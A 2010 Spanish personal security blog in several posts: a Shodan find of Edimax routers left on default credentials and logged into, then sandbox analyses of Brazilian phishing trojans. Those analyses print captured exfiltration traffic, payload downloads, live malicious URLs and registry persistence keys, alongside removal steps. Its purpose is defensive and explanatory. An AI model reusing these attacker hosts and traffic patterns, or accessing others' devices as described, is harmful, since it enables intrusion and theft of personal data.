jueves, 29 de julio de 2010

El eterno dilema de las configuraciones por defecto...

Las configuraciones por defecto/default son aquellas que se obtienen por el simple hecho de instalar o poner en funcionamiento un determinado producto. Es decir, es la configuración que el fabricante da a su producto antes de ponerlo en el mercado y por lo tanto la configuración inicial con la que se encuentra el cliente al utilizarlo. Esta medida adoptada por los fabricantes facilita, entre otras cosas, la documentación y presentación de sus productos.
Ahora... el problema radica en que estas configuraciones deberían ser reemplazadas por configuraciones específicas/personalizadas definidas por el usuario/cliente antes de que el producto sea puesto en funcionamiento.

¿Por qué cambiarlas si anda bien así? mmm una buena pregunta, es tan lindo cuando todo funciona perfectamente (o al menos eso parece) que nadie quiere tocarlo. Pero... las configuraciones por defecto se encuentran en la documentación del producto... y la documentación del producto se puede encontrar en internet... entonces nuestra configuración se encuentra a disposición de todo ser vivo capaz de escribir www.google.com en su browser favorito.

Hay cientos de sitios en internet (al alcance de www.google.com...) que se encargan, por ejemplo, de listar los user/password por defecto de aplicaciones y productos.

 Hoy mientras probaba mi suscripción a http://www.shodanhq.com (un buscador... diferente) me encontré con una serie de dispositivos con contraseñas por defecto.
Lo que realmente me llamó la atención fue ver esto:

Correspondiente a algún lugar de Canada según MaxMind GeoIP

 Israel

Israel

Los 3 hosts cuentan con routers de la misma marca (Edimax) y los 3 mantienen la configuración por defecto, pero lo gracioso está en cómo el fabricante:
  • Permite acceso http desde internet al router.
  • Presenta la tupla usuario/password por defecto de una forma tan explícita que realmente causa gracia admin/1234.
Pero la totalidad de la culpa recae sobre los clientes, que no se preocuparon por cambiar estos valores y exponen así (ingenuamente tal vez) información valiosa.

Y así es como los incidentes pasan...

En los 3 casos se accede como administrador a la configuración del router, desde donde podemos:
  • Ver las direcciones IP privadas asignadas (en uso en este momento).
  • Configuración del firewall, en uno de ellos se encuentra desactivado.
  • La información del cliente y el servicio de internet.
  • Se pueden ver/eliminar los logs.
  • Y un largo etc, que incluye todo lo que sea posible hacer en cuanto a modificación de la configuración del router xD, yendo desde cambios en la configuración wireless,LAN,WAN hasta cambiarle el firmware jajaja.
Si bien puede parecer algo estúpido, podrían realizarse cosas desde realmente molestas a jodidas.

Moraleja... como dicen por ahí RFM (read the fucking manual) y no dejen las configuraciones por defecto :P.





viernes, 23 de julio de 2010

Otro: "Esse seu orkut e um fake? ou vc nem sabia que existia?‏"

Aca está la muestra de hoy, de nuevo Visualizar.com, esta vez queriendo engañar con un falso link a orkut (la mayor red social brasilera, si no me equivoco, y de google) http://www.orkut.com.br/Main#Profile?uid=7282100705742116-0.13350, que en realidad nos envía a http://ow.ly/2foDE?orkut.com.br/Main#Profile?uid=7282100705742116?0.13350 (si, otra vez ocultado la dirección tras ow.ly) desde donde descargamos otro Visualizar.com, hospedado en un servidor ruso verimgsua.h1.ru/visualizar.php .
Esta vez hay un condimento extra a la usual descarga de imágenes y ejecutables que le siguen a la ejecución de visualizar.com y es una conexión a un servidor FTP. Los datos esta vez son subidos al servidor ftp de la siguiente manera:

220 ftp.xpg.com.br.
USER albumpng
331 Password required for albumpng
PASS
230 User albumpng logged in
TYPE I
200 Type set to I
SYST
215 UNIX Type: L8
PORT 192,168,206,153,19,137
200 PORT command successful.
LIST
150 Opening BINARY mode data connection for file list
226 Transfer complete
CWD lista
250 CWD command successful
PORT 192,168,206,153,19,138
200 PORT command successful.
STOR JUAN-AA57CF7254 [22:07:04] .txt
150 Opening BINARY mode data connection for JUAN-AA57CF7254 [22:07:04] .txt
226 Transfer complete

XPG resulta ser una empresa que brinda servicio de hosting gratuito... www.xpg.com.br.

Eliminé el password por razones obvias... pero dentro del ftp existe un directorio llamado lista donde al momento de escribir esta entrada hay mas de 300 archivos de equipos infectados. Cada archivo además de la información del equipo, recolecta e-mails de los usuarios del equipo, muchos.. muchos correos electrónicos para spam definitivamente.
Admito que mi portugues es muy malo, no logré encontrar en el sitio oficial de xpg un mail de contacto para avisarles de la situación, entonces...

Espero que los chicos tengan backup... sino se van a enojar mucho conmigo...

El reporte del día de hoy, corto pero conciso...

Aprovecho para agregar algo nuevo, esta vez durante toda la prueba utlicé un software de monitoreo que se llama CaptureBAT, si bien es un tanto "poco amigable" ofrece buen información:

Aca las dos claves del registro que hay que eliminar para que no se inicien los procesos maliciosos al arrancar la PC. A decir verdad, las claves de registro modificadas por Visualizar.com son demasiadas... a tal punto que el archivo de log pesa unos 1300Kb (de puro texto plano...)
juan@moon:~/Escritorio/test23julio/carpeta sin título$ cat salida_limpia.txt | grep Run
registry: SetValueKey C:\Arquivo de programas\mss.exe -> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msgrmsn
registry: SetValueKey C:\Arquivo de programas\satplg.exe -> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run




Aca vemos como a medida que se completa la descarga de los ejecutables comienzan a lanzarse los nuevos procesos entre ellos.
juan@moon:~/Escritorio/test23julio/carpeta sin título$ cat salida_limpia.txt | grep "process: created"
process: created C:\WINDOWS\explorer.exe -> C:\Documents and Settings\Administrador\Escritorio\Visualizar.com
process: created C:\Documents and Settings\Administrador\Escritorio\Visualizar.com -> C:\Arquivo de programas\wink.exe
process: created C:\Documents and Settings\Administrador\Escritorio\Visualizar.com -> C:\Arquivo de programas\mstim.exe
process: created C:\Arquivo de programas\mstim.exe -> C:\WINDOWS\system32\dwwin.exe
process: created C:\Documents and Settings\Administrador\Escritorio\Visualizar.com -> C:\Arquivo de programas\noix.exe
process: created C:\Arquivo de programas\noix.exe -> C:\WINDOWS\system32\net.exe
process: created C:\WINDOWS\system32\net.exe -> C:\WINDOWS\system32\net1.exe
process: created C:\Documents and Settings\Administrador\Escritorio\Visualizar.com -> C:\Arquivo de programas\mss.exe
process: created C:\Documents and Settings\Administrador\Escritorio\Visualizar.com -> C:\Arquivo de programas\satplg.exe

lunes, 19 de julio de 2010

Se mantiene el MO: "Video porno caseiro de bruno e Eliza Samudio..Download!‏"

Descargando un poco la tensión de los exámenes... acabo a revisar mi mail para ver si me encontraba con algo interesante. Para "mi sorpresa", mi contacto preferida (la que me inspiró las ultimas 3 entradas) me envió un mail. Esta vez se trata de un supuesto video en:

http://blogspot.com/video/Eliza_Samudio002.avi-0.41616

que en realidad es un link a

http://loopstkerh.h1.ru/visualizar.ph p?0.41616 (el espacio está incluido para romper el link)

Desde allí nos descarga un archivo "Visualizar.com", sisi, nombre similar a uno de los archivos de las entradas anteriores. Análisis de virustotal.com: http://www.virustotal.com/es/analisis/05dd1784fd3971e92a40a906bec457bb347e437cc380dcc48f713eeaba053804-1279559435

Probando nuestro nuevo archivo en un entorno aislado observamos:

1-Descarga del sitio: http://www.verstkerh.h1.ru/


2-Una vez descargado comienza a hacer cosas interesante. Se conecta a una base de datos, aparentemente un sqlserver y nos presenta un login de messenger para meter nuestros datos (curiosamente en portugues...):


Jamás utilicé SqlServer, pero claramente se tata de uno. Una vez establecida la conexión con el servidor de base de datos hace muchas consultas UPDATES subiendo mi información de infección y luego descarga una módica suma de mas de 1300 direcciones de email con sus respectivas contraseñas... a partir de ahora se conecta a los servidores de hotmail e intenta enviar correos.

3-Ahora se me ocurrió probar qué hace realmente esta pantalla de menssenger, que no es mas que una imagen con dos campos para ingresar. Ingresé el siguiente mail: "alhoja@nada.com" y contraseña "asdasdasd", veamos:

Lo anterior es un fragmento de la conexión que se establece con el servidor de base de datos cuando ingresamos nuestro mail y contraseña. Se puede ver como se realiza un insert de nuestros datoss de la forma "INSERT INTO msnlst (contactos) VALUES (''alhoja@nada.com,asdasdasd");" que es exáctamente el formato en el que se descargó la lista de mails anteriormente. Luego de esto, la venta fraudulenta nos avisa que pusimos mal la contraseña y lanza ahora si, el proceso original msn messenger para que no surjan sospechas.

Un proceso que queda corriendo es mstimer, que intenta obtener un login positivo para poder enviar mails desde la cuenta robada.

Es MUCHA la cantidad de archivos descargados en los directorios de temporales. Algunos archivos son las keys para la conexión con las bases de datos (autofirmadas, claramente), muchas imágenes, cookies, etc. En el disco C se depositan los siguientes archivos:

En arquivo de programas

msg.txt contiene el mensajes que se envía por email, en este caso se trata de una foto con un link a la descarga de Visualizar.com.
mstimer.exe y csrrs.exe son los encargados de hacer el trabajo sucio

csrrs.exe es quien se conecta con la base de datos para enviar y descargar correos e información.

mstimer.exe es el que realiza la autenticación contra hotmail para enviar los correos.

El método de subsistencia parece ser dos entradas al registro, una para cada uno de los dos ejecutables anteriores.

[HKEY_USERS\S-1-5-21-527237240-1958367476-1417001333-500\Software\Microsoft\Windows\CurrentVersion\Run]
"Winnet"="C:\\Arquivo de programas\\csrrs.exe"
"Msnnet"="C:\\Arquivo de programas\\mstimer.exe"

COMPLETAMENTE recomendable eliminarlas, junto con TODO el directorio "Arquivo de programas", notese... "arQUIVO de programas", siempre se trata de malware diseñado manteniendo como objetivo primario a brasil. También es recomendable elimiar TODO el contenido temporal del browser y pasar el antivirus (si, el que actualizas todos los días :P).

Voy a intentar... si el tiempo y la cabeza me lo permiten investigar un poco mas sobre los archivos descargados.

domingo, 18 de julio de 2010

Otro caso interesante: "O vídeo mais acessado do youtube, mais de 56 milhões de acessos. muito bom esse vídeo!!!!!"

En fin... esto se está haciendo vicio ya. Con pocas ganas de estudiar para los finales, aca estoy, de nuevo escribiendo sobre un mail fraudulento. Una vez mas el medio es, un supuesto video de youtube, lo gracioso es que es del mismo mail que los dos anteriores xD. El título indica el texto del mail, que viene junto con una imagen que aparenta ser un video, pero no es mas que un link al sitio: "http://premiumassessoria.com.br/css/index.p hp" que nos invita a descargar un archivo (ver.exe, sisi... .exe) de un sitio ruso....

Si por una de esas cuestiones de la vida ejecutamos este archivo (en las máquinas virtuales no uso antivirus, porque son justamente para hacer estas cosas feas) y el SIEMPRE actualizado antivirus no nos detiene, nos encontraremos bajando (de vidaboa2009.pochta.ru, que por momentos parece estar inhabilitado) un archivo llamado Vver.exe. La resolución dns del nombre nos indica que es un CNAME, y que realmente apunto a ftp.pochta.ru (un ftp si acceso anónimo xD), así y todo el archivo se descarga por http.

Acá se pone interesante, luego de descargar el archivo e infectar el sistema, pide una resolución dns para smtp.terra.com.br (un servidor de correo, seguramente de terra brasil). Con la dirección obtenida se intenta una conexión smtp (seguramente para utilizar el servidor de correo como servidor para enviar spam), pero sin éxito, posiblemente la gente de terra ya se puso manos a la obra.

El siguiente dominio a consultar es www.arqueiroverde.net, y se envía por POST la siguiente info a http://www.arqueiroverde.net/enviador.php

praquem=xurupita02@gmail.com&titulo=.::.INFECT.::.&texto=:::=-=-=-=-=-=-=-=-=-=-=-=-=-=-::: ::Usuario::  ::Monitor:: 1280 X 800 ::HD Fisico::::0485F93D ::Mac Adress:::00-0C-29-D5-C0-72 ::Data:: 17/07/2010 ::Hora::: 23:47:18 =-=-=-=--=-=-=-=-=-=-==-=-=-=-==-= &

Otro mail para nuestra lista de buenos amigos xD.

Arqueiroverde.net... lista el contenido del directorio raiz del sitio, algo muy raro, se pueden ver dos directorios, y el archivo enviador.php.

Por ultimo, el proceso que queda en ejecución en background (spoolvv) establece una comunicación http con el host "http://sbr9.hostdime.com.b r", pero no pude ver tráfico, posiblemente ya esté deshabilitado.

mmmm, para removerlo...

Primero que nada limpiar el contenido temporal del browser, cookies, etc. Luego eliminar los archivos que se crearon en C:\Windows\System32 (en caso de XP):



Y por último quitar la clave de autoarranque del registro:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
@="C:\\Windows\\System32\\win_update.exe"

Al parecer para este llegué un poco tarde, ya que está bastante restringida su operación, al menos al parecer. Espero que aparezca uno mas interesante en estos días.

Tendría que ir pensando en escribir algo distinto, pero bue... por ahora la facultad no me permite otra cosa.

jueves, 15 de julio de 2010

Otro mail interesante "Encontrado o Corpo da ex-amante do Goleiro Bruno do Flamento.‏"

Como tengo muuuuuchos contactos que me quieren y se preocupan por mi falta de interacción con la sociedad, recibo varios mails al día, de los cuales la mayoria son cadenas/spam/phishing, y solamente leo los últimos xD.
Hoy me encontré con uno que me invita a ver un video de youtube sobre el cuerpo de alguna ex-amante de "Bruno do Flamento", que al parecer se trata de un caso de homicidio donde se investiga a un jugador del club Flamengo llamado Bruno. Los brasileros tienen un interesante índice de casos de phising xD.
El link a youtube es: http://www.youtube.com/watch?v=SroGd-1ahG0&feature=related-0.48874 realmente es el link a un video que no está disponible (seguramente porque NUNCA existió tal video), pero a decir verdad cuando uno hace click sobre el supuesto link, este no es mas que texto con un enlace a la dirección "http://bit.ly/byg70N?0.48874", sisi, uno de esos enlaces anonimizados xD. El link nos "invita" a descargar un archivo llamado "fotos.com" de http://www.oabpr.com.br/imagens/noticia/g/fotos. com, sisi.... ni se esfuerzan para ocultar la extensión xD.
Un sitio un tanto... extraño diría... diseñado por los chicos de Webk2 (cuyo sitio está terriblemente bloqueado por los navegadores...). El sitio oabpr.com.br adolece de MUCHAS vulnerabilidades a SIMPLE vista, y es el lugar ideal para cultivar porquerias, como están haciendo los chicos de "Hacked by Vrs-hCk - c0li.m0de.0n.".
El sitio está... increiblemente comprometido, al punto que da a pensar que fue creado con esa idea, si bien parece tener contenido relacionado (es un sitio de los abogados de brazil, que loco, no?). Entre las cosas que hay: un shell en php que permite hacer prácticamente cualquier cosa desde el servidor, scripts para enviar spam..., varios archivos .exe y .com para descargar e infectarse..., etc, y un aparente gestor de logs xD. MUY MUY comprometido...

 En fin..., ahora un poco del funcionamiento de nuestro fotos.com:
1-Lo primero que aparentemente hace es descargarse un archivo llamado sidebar.exe (algun tipo de barra para IE posiblemente) de otro posible sitio comprometido: www.avinnovo.com/modules/mod_archive/tmpl/sidebr. exe.
2-Luego comienza a descargar imágenes,alguno que otro .sys/.exe/.pri/.ico, muchas de hecho, del sitio sambananas.dk/pics/train/ (dk resulta ser el TLD correspondiente a Dinamarca...). Gracioso que todas las imágenes que descarga hacen referencia a entidades bancarias... e íconos de navegadores web como IE y FF.
3-Una vez que descarga todas sus cosas y las acomoda en "Arquivos de progrmas" y directorios locales del usuario, ahora, haciendo uso de http://meuip.datahouse.com.br/, el bichito captura la ip publica del infectado :D. Y aca viene algo divertido, luego de capturar mi IP, se conecta sin resolución de nombres a una dirección específica (aparentemente otro sitio brasilero comprometido, que mas bien parece un fake porque no tiene un nombre de dominio propio...) a la cual envía los siguientes datos (POST /ajax/indx.php HTTP/1.0):

URLENCODED:
from=%5B%2B1%5D+INFECT+%3D%29&FromMail=infects%40rbd%2Ecom&destino=fcorp2009%40gmail%2Ecom&assunto=%5B%2B1+Infect%5D%3A+JUAN%2DAA57CF7254+Vem+q+vem+INFECTs%21+%3A%29&mensagem=Computer+Name%3A+JUAN%2DAA57CF7254%0DStatus+GBPLUGIN%3A+Plugin+de+Seguran%E7a+n%E3o+Instalado%2E%0DDate%3A+15%2F07%2F2010+%2D+Atual%0DTime%3A+00%3A14%3A52+%2D+Atual%0DIP%3A+201%2E253%2E149%2E60%0DMAC+ADR%3A+00%2D0C%2D29%2DD5%2DC0%2D72%0DLocaliza%E7%E3o%3A+Espa%F1a%0D%5Bx%5D+Url%27s+Visitadas+%5Bx%5D%0D%0A%0D%0Ahttp%3A%2F%2Fchat%2Earnet%2Ecom%2Ear%2F%0D%0A%5C%5C10%2E0%2E0%2E2%5CC%0D%0Ahttp%3A%2F%2Fwww%2Emegaupload%2Ecom%2F%0D%0Ahttp%3A%2F%2Fwww%2Eamericaenvivo%2Ecom%2Ear%2F%0D%0A&

URLDECODED:
from=[+1] INFECT =)&FromMail=infects@rbd.com&destino=fcorp2009@gmail.com&assunto=[+1 Infect]: JUAN-AA57CF7254 Vem q vem INFECTs! :)&mensagem=Computer Name: JUAN-AA57CF7254 Status GBPLUGIN: Plugin de Segurança não Instalado. Date: 15/07/2010 - Atual Time: 00:14:52 - Atual IP: 201.253.149.XX MAC ADR: 00-0C-29-D5-C0-72 Localização: España [x] Url's Visitadas [x]  http://chat.arnet.com.ar/ \\10.0.0.2\C http://www.megaupload.com/ http://www.americaenvivo.com.ar/ &

JA!, mirá que bien, saben que a veces paseo por el chat de arnet, bajo contenido GPL de megaupload y miro américa xD. Además de mi IP, máscara de red y mi hermoso nombre xD. También dice (según mi PRECARIO portugues) que el plugin de seguridad a sido instalado mmm... y que soy de españa, algo obvio... joder!
Aparentemente son datos para enviar por email, por las direcciones de origen y destino involucradas...
HOLA, ahora estoy oficialmente infectado xD.
Lo gracioso, es que  http://201.2.106.69/ajax/indx. php, si, nótese inDX, sin E, no existe en el servidor (o responde con 404 a modo de despistar...), si en cambio existe index.php (que da un error al conectarse al servidor mysql aparentemente).

En fin... son muchos los bancos que se encuentran representados por las imágenes que se descargan, evidentemente destinadas a phishing...
También aparece un tercero dominio involucrado..., hum.au.dk, otro sitio de dinamarca posiblemente comprometido, ya que aparentemente se trata de una organización de bien xD. También el dominio http://cluster003.ovh.net/, aparentemente un servidor de mail "multipropósito", voy a ver mas sobre este, parece interesante.
Bueno, para permanecer atento, el bichito registra un par de claves en el registro de windows (el viejo truco xD):

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ctmon2"="C:\\Arquivos de programas\\Sidebar\\new.exe"
"ctmon32"="C:\\Arquivos de programas\\Sidebar\\java32.exe"

 [HKEY_USERS\S-1-5-21-527237240-1958367476-1417001333-500\Software\Microsoft\Windows\CurrentVersion\Run]
"msnmsr"="C:\\Arquivos de programas\\Sidebar\\new.exe"
"ctmon32"="C:\\Arquivos de programas\\Sidebar\\java32.exe"

[HKEY_USERS\S-1-5-21-527237240-1958367476-1417001333-500\Software\Microsoft\Windows\CurrentVersion\Run]
"msnmsr"="C:\\Arquivos de programas\\Sidebar\\new.exe"
"ctmon32"="C:\\Arquivos de programas\\Sidebar\\java32.exe"

y ahora?

Suponiendo que este sea el único método de supervivencia que utiliza, su eliminación es simple, basta con buscarlo en el registro y eliminar todas las claves de ese tipo, remover por completo el directorio "Arquivos de programas" (salvo que tengas el sistema operativo en portugues jajajaja), y eliminar todo el contenido temporal de internet (y pasar el antivirus xD, si es que todavía funciona).

Se extendió demasiado esto jaja, solo espero que alguien lo lea y comente al respecto. Me gustaría poder hacer un análisis un poco mas forense del tema pero ni el conocimiento ni el tiempo me lo permiten, al menos por ahora.

No puse muchos nombres de dominio, IPs e imágenes porque... bueno, no quiero romperle las bolas a nadie, solamente mostrar lo que está pasando.

Está claro que el phishing está en su pico mas alto de productividad... no noté cambio alguno en mis browsers FF 3.5.10 e IE 6.0, pero posiblemente un análisis mas detallado de los archivos descargados sea interesante, después de todo uno de los datos enviados por el bichito es una confirmacion de actualización/infección...

En fin, aca corto, cualquier comentario es bien venido :P.

viernes, 9 de julio de 2010

Los chicos de brazil y sus troyanos (botnet?)

Hoy a la siesta mientras esperabamos a Nicolás, Fernando desarmaba una xbox y yo... leía un poco de DB2 me llegó un mail de un contacto del messenger que jamás me escribiría un mail xD. Cuando leo el mail, claramente no era del remitente que acusaba ser, (incluso hotmail lo detectó como posible falsificación) ya que venía escrito en portugues :P y dice:

Desculpa, por nao ter enviado logo, mas ai esta o album para visualizar ta ....


CLIQUE PARA VISUALIZAR
-0.36152

Que si mi pésimo portugues de secundario no se equivoca significa: "Perdona por no haberte enviado el logo, aqui está el album para ver...", gracioso. En fin..., viendo el link un poco dije... veamos que me trae este dulce mail xD: "http://correioss.info/visualizar . php?=fotosaniversario.html?0.36152", (notese los espacios en el punto" . ") el link nos pide descargar un hermoso ejecutable (visualizar.exe).

http://correioss.info ... "It works!" para el que alguna vez instaló apache en un debian (por ejemplo), este es el mensaje por defecto de una instalación exitosa :D. Los chicos instalaron apache para jugar... Y como jugar es divertido empecé a buscar directorios interesantes en el servidor, vean http://correioss.info/php/ :








Un login :P, los chicos tienen un login para jugar!!! bien... probando un nombre cualquiera a ver si me dejan jugar a mi también :D:

Apaaaaa!!! parece que juan no está invitado a la fiesta de don "S1turn0" y no tengo ningún infectado :P. Al parecer los chicos perdieron un archivo relatorio.html.
El sitio está dividido en 3 frames, el superior es cont.php, el del medio es relatorio.html y el de abajo rdp.php.
logout es un enlace a un lugar llamado: http://www.site.com.br/contador/ que no es mas que una imagen de un 0 (en este caso), www.site.com.br es el sitio de un hosting de brazil...

 Como me fui quedando sin ideas decidí ver que pretendía de mi la invitación (visualizar.exe), a diferencia de los archivos "analizados" anteriormete este es mas divertido :P.

Entonces ejecuté el archivito en cuestión en un entorno un tanto aislado (windows XP SP3 + SandBoxie + con conexión a internet).
Lo que sucedio fue:
1-Pidio una resolución de nombres para el dominio correioss.info y con la ip devuelta hiso lo siguiente:

/*PETICION*/
POST /php/contador.php HTTP/1.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 161
Host: correioss.info
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)

computador=JUAN%2DAA57CF7254&usuario=Administrador&shd_fisico=00EE2004&shd_firmware=0485F93D&mac=00%2D0C%2D29%2D6C%2DC1%2D1A&windir=&pag_inic=http%3A%2F%2Fla%2F&

/*RESPUESTA*/
HTTP/1.1 200 OK
Date: Fri, 09 Jul 2010 03:42:28 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.6-3ubuntu4.5 with Suhosin-Patch mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.6-3ubuntu4.5
Content-Length: 236
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html



Warning:  fopen(08-Jul-2010 23-42-29.html) [function.fopen]: failed to open stream: Permission denied in /var/www/php/contador.php on line 15

Nao pude abrir o seu arquivo...

Divertido como se hicieron con mi nombre de usuario, dirección mac, etc... JA! estos chicos molestos. Pero al parecer no pudieron registrar mucho porque falló la operación fopen por permisos denegados xD.

2-No les alcanzó con cargarse mis datos, vinieron por mas... ahora el bichito intenta acceder a una suerte de login con:

/*PETICION*/
GET /php/acesso.php HTTP/1.1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Host: correioss.info
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)

/*RESPUESTA*/
HTTP/1.1 200 OK
Date: Fri, 09 Jul 2010 03:42:29 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.6-3ubuntu4.5 with Suhosin-Patch mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.6-3ubuntu4.5
Content-Length: 934
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

Warning:  fopen(acessos.txt) [function.fopen]: failed to open stream: Permission denied in /var/www/php/acesso.php on line 3
Warning:  fread(): supplied argument is not a valid stream resource in /var/www/php/acesso.php on line 4
Warning:  fclose(): supplied argument is not a valid stream resource in /var/www/php/acesso.php on line 5
Warning:  fopen(acessos.txt) [function.fopen]: failed to open stream: Permission denied in /var/www/php/acesso.php on line 7
Warning:  fputs(): supplied argument is not a valid stream resource in /var/www/php/acesso.php on line 8
Warning:  fclose(): supplied argument is not a valid stream resource in /var/www/php/acesso.php on line 9

Pero siguen sin poder escribir en el archivo acessos.txt :(, que de hecho tiene un 0 guardado xD.

3-Y bueno... (pensé que no daba para mas...) ahora se le ocurrió descargar otro bichito mas oO...

/*PETICION*/
GET /nero1.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: correioss.info
Connection: Keep-Alive

/*RESPUESTA*/
HTTP/1.1 200 OK
Date: Fri, 09 Jul 2010 03:42:32 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.6-3ubuntu4.5 with Suhosin-Patch mod_perl/2.0.3 Perl/v5.8.8
Last-Modified: Wed, 07 Jul 2010 14:49:37 GMT
ETag: "7f98680-233600-48acd475c4240"
Accept-Ranges: bytes
Content-Length: 2307584
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program

Como se imaginaran en esta respuesta llegó una buena cantidad de bytes correspondientes al archivo "nero1.exe" que acaba de descargarse.

El ultimo mensaje http es el siguiente:

NTkrnl Secure Suite
Version 0.1
Metamorphism Portable Executable (PE) Packer and Protector Library
Copyright . 2006-2007 Ashkbiz Danehkar
All Rights Reserved

Homepage: http://www.ntkrnl.com 
E-mail: info@ntkrnl.com NTkrnl Geborgene Zeug
Version 0.1
Metamorphismus Portable Executable (PE) Packer und Besch.tzer Bibliothek
Urheberrechtlicher . 2006-2007 Ashkbiz Danehkar
Alle Rechten reservierten

HauseSeite: http://www.ntkrnl.com  
E-Mail: info@ntkrnl.com NTkrnl Sicuro Seguito
Version 0.1
Metamorphism Portable Eseguibile (PE) Biblioteca del Imballatore e del Protettore
Propriet. letterario riservato . 2006-2007 Ashkbiz Danehkar

Casa pagina: http://www.ntkrnl.com 
E-mail: info@ntkrnl.com

JA!, el sitio está fuera, pero básicamente consiste en una suerte de protector de código (para que la gente que sabe de estas cosas no pueda descubrir el real funcionamiento del bichito).

Pero no termina aca :P, re denso son los tipitos estos jaja.

4-Al parecer como todo iba mal en el dominio .info los chicos levantaron otro server en el dominio .net :P, el bichito pidio una resolución de nombres para www.correioss.net (ambas ips muy similares...). Una vez obtenida la ip conversaron un poco:

/*PETICION*/
POST /enter.php HTTP/1.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Host: www.correioss.net
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)

tipo=cli&cli=JUAN%2DAA57CF7254&

/*RESPUESTA*/
HTTP/1.1 200 OK
Date: Fri, 09 Jul 2010 03:43:57 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4 with Suhosin-Patch mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.6-3ubuntu4
Content-Length: 2
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

OK

ok? qué??? eso es todo? en la peticion se aclaran dos cosas un tipo=cli (cliente ?) y el nombre del cliente :P, yo!.

5-JA!, mirá lo que hacen los nenessssss!!!

/*PETICION*/
POST /atualizado/update.php HTTP/1.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 149
Host: correioss.net
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)

praquem=wwwcaix%40gmail%2Ecom&titulo=JUAN%2DAA57CF7254+007&texto=%2E%2E%2E%2E%2Eby%2Ecyrus%2E%23%40%2E%2E%2E%2E%2E%0D%0AAtualizada+para%3A+007%0D%0A&

/*RESPUESTA*/
HTTP/1.1 200 OK
Date: Fri, 09 Jul 2010 03:43:58 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4 with Suhosin-Patch mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.6-3ubuntu4
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

Que tiernosss ¬¬, ahora están poniendose al día :P, /atualizado/update.php contiene la siguiente info:

praquem=wwwcaix@gmail.com&titulo=JUAN-AA57CF7254 007&texto=.....by.cyrus.#@..... Atualizada para: 007 &

Osea que ahora wwwcaix@gmail.com recibe un mail con mis datos :P, "hola caix soy juan ¬¬" y cyrus no pudo contenerse e incluirse en el contenido del mail :P.

6-Luego algo extraño que no voy a incluir hasta no estar seguro.

7-Otra resolución de nombres :D, esta vez por www.itau.com.br

/*PETICION*/
GET / HTTP/1.1
Accept: */*
Accept-Language: es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: www.itau.com.br
Connection: Keep-Alive
/*RESPUESTA*/
HTTP/1.1 200 OK
Date: Fri, 09 Jul 2010 03:41:23 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 14 May 2010 22:16:22 GMT
ETag: "265e-16c7-39a1d980"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1410
Keep-Alive: timeout=5, max=500000
Connection: Keep-Alive
Content-Type: text/html

Esta parte realmente me dio cagaso... itaú es un banco brasilero... Aparentemente en este punto no fue mas que un get al sitio del banco... o al menos eso parece... voy a ver un poco mas sobre este punto cuando tenga tiempo.

8-Otra resolución, esta vez por updater.hd1.com.br y buscando lo siguiente:

/*PETICION*/
GET /versaoatual.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: updater.hd1.com.br
Connection: Keep-Alive

/*RESPUESTA*/
HTTP/1.1 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "-803475731"
Last-Modified: Wed, 07 Jul 2010 15:52:35 GMT
Content-Length: 3
Date: Fri, 09 Jul 2010 04:42:03 GMT
Server: lighttpd/1.4.19

007

/*PETICION*/
GET /downloadkey.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: updater.hd1.com.br
Connection: Keep-Alive




/*RESPUESTA*/
HTTP/1.1 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "129092051"
Last-Modified: Sun, 04 Jul 2010 06:36:48 GMT
Content-Length: 31
Date: Fri, 09 Jul 2010 04:42:03 GMT
Server: lighttpd/1.4.19

http://correioss.info/nero1.exe

